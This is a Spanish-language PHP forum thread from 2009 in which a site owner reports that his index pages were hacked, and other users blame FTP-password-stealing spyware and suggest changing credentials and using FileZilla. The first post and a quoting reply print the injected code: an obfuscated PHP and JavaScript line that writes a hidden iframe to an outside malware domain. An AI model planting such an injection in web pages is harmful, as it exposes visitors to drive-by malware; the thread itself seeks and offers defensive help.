Foros del Web » Programando para Internet » PHP »

Virus en vi web

Estas en el tema de Virus en vi web en el foro de PHP en Foros del Web. Hola a todos tengo un problemas con mis Web y no se de donde proviene. A cualquiera que me pueda ayudar agradezco por adelantado. Bueno ...
  #1 (permalink)  
Antiguo 03/07/2009, 15:46
 
Fecha de Ingreso: abril-2006
Mensajes: 5
Antigüedad: 18 años
Puntos: 0
Virus en vi web

Hola a todos tengo un problemas con mis Web y no se de donde proviene. A cualquiera que me pueda ayudar agradezco por adelantado.

Bueno el problema es el siguiente tengo un par de sitios diseñados alojados en un hosting pago. El tema es que hace poco empecé a tener problemas con el index y el home/inicio/principal. Cuando entra me tira un error de PHP. Todas están realizadas en PHP. Y el tema es que pude detectar que alguien esta entrando no se de que manera y escribí este código que es el que provoca el error supongo.

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

Esto es lo que pude ver pero no entiendo como hacen para entrar o como es el tema. El problema es que entonces cuando entras a una Web salta un error de PHP y no muestra nada. Bueno si alguien me puede ayudar vuelvo a agradecer. Éxitos!
  #2 (permalink)  
Antiguo 03/07/2009, 16:10
Avatar de aldo1982  
Fecha de Ingreso: noviembre-2004
Ubicación: Santa Fe (Argentina) Colon F.C
Mensajes: 1.362
Antigüedad: 19 años, 4 meses
Puntos: 6
De acuerdo Respuesta: Virus en vi web

Cita:
Iniciado por pattolucas Ver Mensaje
Hola a todos tengo un problemas con mis Web y no se de donde proviene. A cualquiera que me pueda ayudar agradezco por adelantado.

Bueno el problema es el siguiente tengo un par de sitios diseñados alojados en un hosting pago. El tema es que hace poco empecé a tener problemas con el index y el home/inicio/principal. Cuando entra me tira un error de PHP. Todas están realizadas en PHP. Y el tema es que pude detectar que alguien esta entrando no se de que manera y escribí este código que es el que provoca el error supongo.

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

Esto es lo que pude ver pero no entiendo como hacen para entrar o como es el tema. El problema es que entonces cuando entras a una Web salta un error de PHP y no muestra nada. Bueno si alguien me puede ayudar vuelvo a agradecer. Éxitos!
hola me susedia lo mismo.

posible causa: spyware en tu PC que busca conexiones FTP y modifica lso archivos index home default de tu servidor agregando un iframe

solucion: saca el spyware de tu pc (recomiendo formatear) y despeus cambia la password del ftp.

te pregunto: no usas cutte ftp ? porque no se por dodne se me metio ese bicho de mier$%&@


salu2
__________________
LA MUERTE ESTÁ TAN SEGURA DE VENCER QUE NOS DA TODA UNA VIDA DE VENTAJA
  #3 (permalink)  
Antiguo 03/07/2009, 16:55
 
Fecha de Ingreso: abril-2006
Mensajes: 5
Antigüedad: 18 años
Puntos: 0
De acuerdo Respuesta: Virus en vi web

Hola aldo1982 gracias por la pronta respuesta!!!, mira te cuento como entro al ftp quizas es una manera muy insegura. Directamente entro en cualquier ventana de windows por ej: abro MI PC y en el navegador donde dise justamente MI PC escribo ftp.(ladirecciondemiweb).com.ar y ahi voy a archivo iniciar seccion entonces solo queda como una carpeta nomas y copio y pego. Si conoces otra manera mas segura de subir los archivos te lo agradeceria por que quizas sea eso... Exitos!
  #4 (permalink)  
Antiguo 03/07/2009, 18:38
 
Fecha de Ingreso: junio-2009
Mensajes: 15
Antigüedad: 14 años, 9 meses
Puntos: 0
Respuesta: Virus en vi web

Mi opinion y consejo es que uses un gestor FTP como filezilla.

filezilla-project.org/download.php

S4lu2!!
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 03:53.